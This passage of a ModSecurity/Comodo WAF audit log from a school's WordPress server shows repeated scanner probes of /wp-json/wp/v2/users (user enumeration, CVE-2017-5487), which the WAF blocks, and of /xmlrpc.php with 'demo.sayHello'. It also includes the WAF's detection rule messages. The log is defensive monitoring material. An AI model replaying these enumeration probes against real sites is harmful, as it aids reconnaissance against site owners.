"225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836719027462 3482 (- - -) Stopwatch2: 1746836719027462 3482; combined=1553, p1=530, p2=985, p3=0, p4=0, p5=38, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0e93b38-Z-- --bd867e5a-A-- [10/May/2025:07:25:23 +0700] aB6c88i6w7GTj2w44Z6bCQAAANE 103.236.140.4 51480 103.236.140.4 8181 --bd867e5a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bd867e5a-C-- demo.sayHello --bd867e5a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd867e5a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836723458939 6179 (- - -) Stopwatch2: 1746836723458939 6179; combined=4480, p1=659, p2=3615, p3=29, p4=31, p5=86, sr=182, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd867e5a-Z-- --1097ae48-A-- [10/May/2025:07:25:47 +0700] aB6dC8i6w7GTj2w44Z6bDAAAANc 103.236.140.4 51488 103.236.140.4 8181 --1097ae48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1097ae48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1097ae48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836747300449 3223 (- - -) Stopwatch2: 1746836747300449 3223; combined=1483, p1=506, p2=944, p3=0, p4=0, p5=32, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1097ae48-Z-- --9730c27a-A-- [10/May/2025:07:25:51 +0700] aB6dD8i6w7GTj2w44Z6bDgAAAME 103.236.140.4 51492 103.236.140.4 8181 --9730c27a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.93 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9730c27a-C-- demo.sayHello --9730c27a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9730c27a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836751751000 5291 (- - -) Stopwatch2: 1746836751751000 5291; combined=4038, p1=459, p2=3352, p3=28, p4=30, p5=97, sr=68, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9730c27a-Z-- --85df5c78-A-- [10/May/2025:07:26:25 +0700] aB6dMci6w7GTj2w44Z6bEgAAAMw 103.236.140.4 51502 103.236.140.4 8181 --85df5c78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --85df5c78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85df5c78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836785241484 3202 (- - -) Stopwatch2: 1746836785241484 3202; combined=1371, p1=441, p2=901, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85df5c78-Z-- --fe51794c-A-- [10/May/2025:07:26:28 +0700] aB6dNNr9PbfRBMhzxmRZ8AAAAFA 103.236.140.4 51506 103.236.140.4 8181 --fe51794c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.73 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe51794c-C-- demo.sayHello --fe51794c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe51794c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836788363271 4826 (- - -) Stopwatch2: 1746836788363271 4826; combined=3668, p1=461, p2=2998, p3=25, p4=25, p5=92, sr=75, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe51794c-Z-- --ce323734-A-- [10/May/2025:07:26:39 +0700] aB6dP6uC4AqLGUOyzyX7PwAAAI0 103.236.140.4 51510 103.236.140.4 8181 --ce323734-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce323734-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce323734-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836799295520 2797 (- - -) Stopwatch2: 1746836799295520 2797; combined=1272, p1=421, p2=821, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce323734-Z-- --6b99ae50-A-- [10/May/2025:07:26:42 +0700] aB6dQsi6w7GTj2w44Z6bFAAAAMs 103.236.140.4 51514 103.236.140.4 8181 --6b99ae50-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.14 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b99ae50-C-- demo.sayHello --6b99ae50-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b99ae50-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836802518122 6851 (- - -) Stopwatch2: 1746836802518122 6851; combined=4904, p1=616, p2=4035, p3=38, p4=45, p5=101, sr=79, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b99ae50-Z-- --b9242b7f-A-- [10/May/2025:07:27:14 +0700] aB6dYsi6w7GTj2w44Z6bTgAAAMQ 103.236.140.4 51888 103.236.140.4 8181 --b9242b7f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b9242b7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9242b7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836834530719 2816 (- - -) Stopwatch2: 1746836834530719 2816; combined=1069, p1=365, p2=681, p3=0, p4=0, p5=23, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9242b7f-Z-- --44968330-A-- [10/May/2025:07:27:20 +0700] aB6daKuC4AqLGUOyzyX7fQAAAIo 103.236.140.4 51972 103.236.140.4 8181 --44968330-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --44968330-C-- demo.sayHello --44968330-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --44968330-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836840665494 3853 (- - -) Stopwatch2: 1746836840665494 3853; combined=2794, p1=407, p2=2232, p3=27, p4=25, p5=61, sr=50, sw=42, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44968330-Z-- --e415c879-A-- [10/May/2025:07:28:38 +0700] aB6dtsi6w7GTj2w44Z6b6QAAAMg 103.236.140.4 53040 103.236.140.4 8181 --e415c879-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e415c879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e415c879-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836918709643 2792 (- - -) Stopwatch2: 1746836918709643 2792; combined=1265, p1=418, p2=818, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e415c879-Z-- --c3eefe7a-A-- [10/May/2025:07:28:39 +0700] aB6dtxLuBiaF9R054QBaWQAAABE 103.236.140.4 53052 103.236.140.4 8181 --c3eefe7a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c3eefe7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3eefe7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836919497171 2813 (- - -) Stopwatch2: 1746836919497171 2813; combined=1228, p1=417, p2=781, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3eefe7a-Z-- --db45e513-A-- [10/May/2025:07:28:42 +0700] aB6duhLuBiaF9R054QBaaQAAABQ 103.236.140.4 53100 103.236.140.4 8181 --db45e513-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.104 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --db45e513-C-- demo.sayHello --db45e513-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --db45e513-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836922432161 4373 (- - -) Stopwatch2: 1746836922432161 4373; combined=3186, p1=473, p2=2447, p3=24, p4=25, p5=119, sr=52, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db45e513-Z-- --07990a4f-A-- [10/May/2025:07:28:43 +0700] aB6du8i6w7GTj2w44Z6b8QAAANc 103.236.140.4 53120 103.236.140.4 8181 --07990a4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --07990a4f-C-- demo.sayHello --07990a4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --07990a4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836923818745 5950 (- - -) Stopwatch2: 1746836923818745 5950; combined=4279, p1=529, p2=3498, p3=32, p4=45, p5=102, sr=75, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07990a4f-Z-- --8b0cbf6e-A-- [10/May/2025:07:50:59 +0700] aB6i8xLuBiaF9R054QBapgAAAA0 103.236.140.4 53332 103.236.140.4 8181 --8b0cbf6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8b0cbf6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b0cbf6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746838259580428 2786 (- - -) Stopwatch2: 1746838259580428 2786; combined=1248, p1=430, p2=789, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b0cbf6e-Z-- --b32e4148-A-- [10/May/2025:07:51:03 +0700] aB6i9xLuBiaF9R054QBaqAAAABM 103.236.140.4 53338 103.236.140.4 8181 --b32e4148-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b32e4148-C-- demo.sayHello --b32e4148-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b32e4148-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746838263690122 5718 (- - -) Stopwatch2: 1746838263690122 5718; combined=4180, p1=556, p2=3395, p3=33, p4=35, p5=95, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b32e4148-Z-- --b7481373-A-- [10/May/2025:08:18:52 +0700] aB6pfBLuBiaF9R054QBaywAAAA4 103.236.140.4 53508 103.236.140.4 8181 --b7481373-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 84.46.243.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 84.46.243.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b7481373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7481373-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746839932833506 2794 (- - -) Stopwatch2: 1746839932833506 2794; combined=1236, p1=425, p2=780, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
